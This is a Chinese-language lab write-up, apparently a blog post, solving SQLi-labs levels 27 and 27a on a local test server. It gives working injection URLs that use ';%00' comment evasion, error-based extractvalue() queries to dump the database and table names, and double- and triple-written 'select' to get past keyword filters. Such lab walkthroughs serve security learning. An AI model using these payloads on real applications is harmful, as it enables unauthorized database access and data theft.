目录

第二十七关

1、判断注入点

2、判断数据库

3、判断表名

第二十七a关

---

第二十七关

知识点：空格、select、union等过滤绕过

思路：

通过分析源码，我们可以知道对用户的输入进行过滤，对空格、select、union等进行了过滤，所以我们的思路是绕过这些过滤

1、判断注入点

首先，输入正常的数据看看回显

接着增加单引号‘

http://127.0.0.1:3306/Less-27/?id=1'

发现报错了，而且有报错信息提示，所以后面我们可以使用报错函数进行注入

增加注释符

http://127.0.0.1:3306/Less-27/?id=1' --+

发现被过滤，我们可以使用;%00来绕过

http://127.0.0.1:3306/Less-27/?id=1';%00

正确回显，说明注释后的闭合方式是单引号

判断回显位置

这里发现空格、union、select都被过滤了，因为我的环境是windows搭建的，空格编码识别不了，所以采用报错函数进行注入，不使用联合查询

2、判断数据库

http://127.0.0.1:3306/Less-27/?id=1'||extractvalue(1,concat(0x7e,database()));%00

3、判断表名

http://127.0.0.1:3306/Less-27/?id=1'||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))));%00

select被过滤了，我们采用双写的方式

http://127.0.0.1:3306/Less-27/?id=1'||extractvalue(1,concat(0x7e,(seleselectct(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))));%00

双写也不行，因为对select进行了二次过滤

http://127.0.0.1:3306/Less-27/?id=1'||extractvalue(1,concat(0x7e,(seleseleselectctct(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))));%00

三写可以进行绕过，还有一种绕过方式，因为没有对SELECT进行二次过滤，所以双写SELECT也可以绕过

http://127.0.0.1:3306/Less-27/?id=1'||extractvalue(1,concat(0x7e,(SELESELECTCT(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))));%00

接下来的步骤就跟26关的一样了，参考一下26关

SQLI-labs-第二十六关和第二十六a关-CSDN博客

---

第二十七a关

知识点：空格、select、union等过滤绕过

思路：

这一关的原理也跟上一关一样，对select、union等进行过滤，只不过闭合方式不一样，而且没有报错信息，所以我们不能使用报错函数，只能使用联合查询，对于union的过滤，我们可以采用双写、三写或者大小写混合的方式进行绕过，这里因为环境问题，不做演示

---

这篇文章就先写到这里了，哪里不懂的欢迎提问